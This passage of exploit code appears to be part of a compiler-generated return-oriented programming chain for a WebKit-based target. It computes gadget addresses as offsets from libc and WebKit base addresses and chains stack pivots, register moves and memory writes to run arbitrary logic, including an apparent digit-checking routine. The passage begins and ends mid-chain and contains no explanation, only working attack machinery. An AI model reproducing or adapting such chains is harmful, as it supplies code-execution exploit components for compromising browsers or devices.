set_gadget(libc_base+764760,); //pop rsi
//L2776:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2777:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+178272, //L2778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2778:
db([0, 0]); // 0x0
//L2752:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+178400, //L2781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+178416, //L2782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+178384, //L2780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2780:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2781:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2782:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+178528, //L2784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+178576, //L2787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+178544, //L2785
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2784:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2785:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2786:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2787:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+178688, //L2788+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+178680, //L2788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2788:
db([0, 0]); // 0x0
set_gadgets([
ropchain+178704, //L2788+24
ropchain+178720, //L2783
libc_base+782311, //pop rsp
ropchain+178736, //L2789
//L2783:
libc_base+782311, //pop rsp
ropchain+179216, //L2790
//L2789:
//L2791:
libc_base+764760, //pop rsi
ropchain+178776, //L2792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2792:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2794:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+178896, //L2797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+178880, //L2795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2795:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2797:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+179056, //L2801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+179008, //L2798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+179024, //L2799
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2798:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2799:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2800:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L2801:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+179112, //L2802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2802:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2804:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+179192, //L2805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2805:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+175896, //L2714
//L2790:
libc_base+764760, //pop rsi
ropchain+179256, //L2807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2807:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2809:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+179376, //L2812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+179360, //L2810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2810:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2812:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+179520, //L2815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+179488, //L2813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+179504, //L2814
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2813:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2814:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2815:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+179600, //L2816
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2816:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2818:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+179720, //L2821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+179704, //L2819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2819:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2821:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+179832, //L2822
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+179864, //L2824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+179848, //L2823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2822:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2823:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2824:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+180008, //L2827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+179992, //L2826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2825:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L2826:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2827:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+180128, //L2828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+180160, //L2830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+180144, //L2829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2828:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2829:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2830:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+180264, //L2831
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+180280, //L2832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2831:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2832:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+180400, //L2833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+180384, //L2834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2834:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2833:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+180488, //L2836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+180472, //L2835
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2835:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2836:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+180592, //L2837
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+180608, //L2838
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2837:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2838:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+180728, //L2839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+180712, //L2840
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2840:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2839:
db([0, 0]); // 0x0
//__is_digit:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+180800, //L2842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2842:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+180888, //L2843
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+180936, //L2846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2843:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2844:
db([48, 0]); // 0x30
set_gadget(libc_base+144605,); //pop rdi
//L2845:
db([48, 0]); // 0x30
set_gadget(webkit_base+568675,); //pop r8
//L2846:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+181032, //L2848
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+181016, //L2847
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2847:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2848:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+181112, //L2849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2849:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2851:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+181232, //L2854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+181216, //L2852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2852:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2854:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+181392, //L2858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+181360, //L2856
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+181376, //L2857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2855:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2856:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2857:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2858:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+181448, //L2860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2860:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+181576, //L2862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+181592, //L2863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+181560, //L2861
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2861:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2862:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2863:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+181752, //L2867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+181720, //L2865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+181736, //L2866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2864:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2865:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2866:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2867:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+181808, //L2869
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2869:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+181936, //L2871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+181952, //L2872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+181920, //L2870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2870:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2871:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2872:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+182032, //L2873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+182048, //L2874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2873:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2874:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+182160, //L2875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+182192, //L2877
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+182176, //L2876
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2875:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2876:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2877:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+2115150, //setle al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+182368, //L2879
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+182384, //L2880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+182352, //L2878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2878:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2879:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2880:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+182544, //L2885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+182560, //L2886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+182496, //L2882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2882:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2883:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L2884:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2885:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2886:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+182672, //L2887+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+182664, //L2887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2887:
db([0, 0]); // 0x0
set_gadgets([
ropchain+182688, //L2887+24
ropchain+184448, //L2881
libc_base+764760, //pop rsi
ropchain+182728, //L2888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2888:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2890:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+182848, //L2893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+182832, //L2891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2891:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2893:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+183008, //L2897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+182976, //L2895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+182992, //L2896
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2894:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2895:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2896:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2897:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+183064, //L2899
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2899:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+183192, //L2901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+183208, //L2902
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+183176, //L2900
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2900:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2901:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2902:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+183368, //L2906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+183336, //L2904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+183352, //L2905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2903:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2904:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2905:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2906:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+183424, //L2908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2908:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+183552, //L2910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+183568, //L2911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+183536, //L2909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2909:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2910:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2911:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+183648, //L2912
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+183664, //L2913
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2912:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2913:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+183760, //L2915
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+183744, //L2914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2914:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2915:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+183840, //L2916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2916:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2917:
db([57, 0]); // 0x39
set_gadget(libc_base+144605,); //pop rdi
//L2918:
db([57, 0]); // 0x39
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+183984, //L2919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+184016, //L2921
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+184000, //L2920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2919:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2920:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2921:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+2115150, //setle al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+184192, //L2923
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+184208, //L2924
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+184176, //L2922
webkit_base+660161, //mov [rsi], rax ; mov al, 1
